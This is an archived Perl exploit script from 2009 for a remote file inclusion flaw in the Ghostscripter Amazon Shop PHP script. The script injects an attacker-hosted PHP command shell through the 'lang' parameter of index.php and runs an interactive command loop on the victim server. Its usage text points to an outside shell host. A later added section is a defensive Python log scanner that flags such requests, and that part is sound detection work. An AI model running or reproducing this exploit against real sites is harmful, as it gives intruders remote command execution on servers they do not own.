Ghostscripter Amazon Shop remote file inclusion exploit
Source: bl4ckend [at]gmail.com  Author: d3b4g  Published: 2009-03-05
#!/usr/bin/perl
#
#ghostscripter Amazon Shop Remote File Include Exploit
#Script :http://ghostscripter.com/amazon_shop.php
#Original Advisory:http://www.milw0rm.com/exploits/8145
#By d3b4g
#Mail:bl4ckend [at]gmail.com
#


use LWP::UserAgent;

$my_Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($my_Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

# Interactive loop: each line read from STDIN is sent as one command.
while()
{
       print "[shell] \$";
       while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

               $sploit = LWP::UserAgent->new() or die;
               # The remote URL is passed in the lang parameter of index.php (the file inclusion point).
               $req = HTTP::Request->new(GET =>$Path.'index.php?lang='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

               $res = $sploit->request($req);
               $return = $res->content;
               $return =~ tr/[\n]/[....]/;

               if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

               elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a that command in <b>/)
                       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
               elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

               if($return =~ /(.*)/)
               {
                       $lolreturn = $1;
                       $lolreturn=~ tr/[....]/[\n]/;
                       print "\r\n$lolreturn\n\r";
                       last;
               }

               else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
 print " ghostscripter Amazon Shop Remote File Include Exploit\r\n";
 print " Exploited by d3b4g\r\n";
 print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
 }

sub usage()
 {
 head();
 print " Usage: Amazon Shop.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
 print " <Site> - Full path to Amazon Shop script ex: http://www.site.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell ex. http://www.shellzsite.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "---------------------------------------------------------------------------\r\n";
 print " By bl4ckend[at]Gmail.com \r\n";
 print "---------------------------------------------------------------------------\r\n";
 exit();
 }
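
Added example, not part of the original exploit or advisory: a log check for the request shape the script above produces, i.e. an `index.php` request whose `lang` parameter carries a URL instead of a language code. It assumes a combined-format access log; the sample lines are constructed, and the check goes beyond the script's `http://` case to cover percent-encoded values and other PHP stream wrappers.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a combined-format access log line.
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that would make a PHP include() pull remote or stream-wrapper content.
REMOTE = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect)://|data:)', re.I)

# Constructed sample lines (documentation IPs and hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2009:10:00:01 +0000] "GET /index.php?lang=en HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Mar/2009:10:00:09 +0000] "GET /index.php?lang=http://files.example.net/cmd.txt?&cmd=id HTTP/1.1" 200 812',
    '198.51.100.7 - - [05/Mar/2009:10:00:15 +0000] "GET /index.php?lang=http%253A%252F%252Ffiles.example.net%252Fcmd.txt HTTP/1.1" 200 790',
    '192.0.2.10 - - [05/Mar/2009:10:01:00 +0000] "GET /index.php?lang=en&ref=http://www.example.com/ HTTP/1.1" 200 5120',
]

def _decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded URLs are still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_hits(line, params=("lang",)):
    """Return [(param, decoded_value)] for watched parameters that carry a URL."""
    match = REQ.search(line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    return [(name, value)
            for name, raw in parse_qsl(query, keep_blank_values=True)
            for value in [_decode(raw)]
            if name.lower() in params and REMOTE.match(value)]

def scan(lines):
    """Return [(line_number, hits)] for every log line with at least one hit."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = rfi_hits(line)
        if hits:
            results.append((number, hits))
    return results

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: remote include attempt via {hits}")
```

Only parameters named in `params` are checked, so the benign `ref=` URL in the last sample line is not reported.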

 